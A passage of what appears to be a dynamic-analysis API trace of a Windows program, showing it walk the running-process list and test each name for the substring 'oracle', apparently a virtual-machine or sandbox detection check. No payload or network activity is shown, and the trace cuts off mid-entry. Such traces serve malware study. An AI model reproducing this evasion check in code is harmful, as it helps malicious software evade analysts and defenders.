LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542c20 [0092.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542c20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.150] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.150] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.150] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.151] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542bd8 [0092.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.151] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.152] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.153] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542ba8 [0092.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.153] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.153] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.155] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542c08 [0092.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542c08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.155] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.155] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.155] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.156] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542c38 [0092.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542c38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.156] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.156] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.157] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542848 [0092.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542848, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.157] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.158] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.163] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35426f8 [0092.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35426f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.163] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.163] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.165] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35426e0 [0092.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35426e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.165] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.165] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.166] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542650 [0092.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542650, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.166] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.166] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.168] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35427d0 [0092.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35427d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.168] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.168] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0092.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.169] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542608 [0092.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3542608, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0092.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0092.169] StrStrIA (lpFirst="spoolsv.exe", lpSrch="oracle") returned 0x0 [0092.169] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.171] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542698 [0092.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542698, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.171] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.171] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.171] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0092.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.172] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542818 [0092.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3542818, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0092.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0092.173] StrStrIA (lpFirst="audiodg.exe", lpSrch="oracle") returned 0x0 [0092.173] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0092.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.175] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542830 [0092.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3542830, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0092.175] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0092.175] StrStrIA (lpFirst="sihost.exe", lpSrch="oracle") returned 0x0 [0092.175] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.177] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542620 [0092.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542620, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.177] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.177] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.177] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0092.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.178] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542668 [0092.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3542668, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0092.178] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.178] StrStrIA (lpFirst="taskhostw.exe", lpSrch="oracle") returned 0x0 [0092.178] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0092.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.179] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542680 [0092.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3542680, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0092.179] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0092.180] StrStrIA (lpFirst="explorer.exe", lpSrch="oracle") returned 0x0 [0092.180] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0092.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.181] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3542ed8 [0092.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3542ed8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0092.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0092.181] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="oracle") returned 0x0 [0092.181] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0092.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0092.182] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355cbf0 [0092.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x355cbf0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0092.182] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0092.182] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="oracle") returned 0x0 [0092.182] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0092.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.184] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3543078 [0092.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3543078, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0092.184] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0092.184] StrStrIA (lpFirst="Memory Compression", lpSrch="oracle") returned 0x0 [0092.184] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0092.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0092.185] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3542df8 [0092.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3542df8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0092.185] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0092.185] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="oracle") returned 0x0 [0092.185] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0092.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.186] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35427b8 [0092.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x35427b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0092.187] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0092.187] StrStrIA (lpFirst="SearchUI.exe", lpSrch="oracle") returned 0x0 [0092.187] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0092.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.188] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3542f78 [0092.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3542f78, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0092.188] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0092.188] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="oracle") returned 0x0 [0092.188] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0092.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.189] LocalAlloc 